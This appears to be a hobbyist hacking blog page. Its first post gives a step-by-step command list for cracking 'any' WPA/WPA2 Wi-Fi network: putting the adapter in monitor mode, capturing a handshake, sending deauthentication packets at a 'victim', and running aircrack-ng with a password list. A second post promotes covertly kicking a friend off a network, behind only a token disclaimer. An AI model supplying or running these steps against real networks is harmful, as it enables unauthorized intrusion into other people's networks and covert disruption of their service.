Showing posts with label aireplay-ng. Show all posts
Showing posts with label aireplay-ng. Show all posts

How to hack Any Wifi Network (WPA/WPA2)

Wifi Hacking (WPA/WPA2)


Wifi is surely a difficult task , but not for the one's who are using Kali linux. 
There are many wifi protocols followed in order to  protect the network but with some tools any wifi network can be Hacked.
"Rules are meant to be broken

For WPA/WPA2 hacking, we need  Kali Linux, Network Adapter 
Execute the following commands

1. ifconfig wlan up (just to ensure our wlan is active)

2. airmon-ng      (to ensure our network card is working)

3. airmon-ng check kill (kills the process that may harm our attack)

4. airmon-ng start wlan1 (starts monitor mode)

5. airodump-ng wlan1

6. airodump-ng --bssid "MAC id of the router" --channel "on which channel it is on " wlanmon1

this command dumps the information of the router , for eg number of devices connected on this network along with the device mac id.

7. airodump-ng --channel "channel number"  --bssid "Station Address" -w /root/WPAsample wlan1mon

now the information is stored in root under the file name of WPAsample

Now open a new terminal 

8. aireplay-ng   --deauth 2000 -a "Mac Address " -c "Victim's Mac Address " wlan1mon

aireplay is a  tool used in Kali Linux which is used to send de-authentication packets. The purpose of de-authentication packets is to kick the existing user out from the network and force him to reconnect.

Open in new terminal 

9. aireplay-ng -0 1 -a " BSSID " -c "Victims Address " wlan1mon

10. aircrack-ng  -w " Location of the password list" " Location of the file "

Video Tutorial of WPA/WPA2 for reference 

                     

    ================================================

How to kick your friend from using from Wifi?

Kali Linux  De-Authentication Attack


How to Kick your friend from Using your wifi without him knowing about it . 


Its very hard to say no, specially to your Friends. You can do nothing if they ask for your Wifii password and then choose to stay because they are too lazy to go back home. 
Now there is a way to stop there usage without them knowing about that. :)

De-authentication is a simple attack used in Kali Linux which kicks the desired target from your Wifii Network. If you are creative, you can even use this attack for hacking Wifii passwords
(This post is for education purpose only, I am not responsible for any of your actions)

Tools Required :
1. Vmware 

2. Kali linux 

3. Network Adapter (which is Compatible with Kali)
(Alpha or Tp-Link)


Watch this video, and if you need any help, support is available 24x7. 




Amit Vijayan

Amit Vijayan
Hack Ethically

About Me


I am an engineering student and i am very dedicated about Ethical Hacking. I have been learning "Ethical Hacking" for about 4 years now.
Though I'am not a pro hacker but also not a noob. I have enough knowledge to give others like me, a start for their Ethical Hacking & Cyber Security. As i keep learning new things, i keep updating them on the blog from basic to advanced level.
I started Ethical Hacking as a hobby which has now turned into my passion and i'am sure i will turn it into my profession through this blog.

Always be an Ethical Hacker.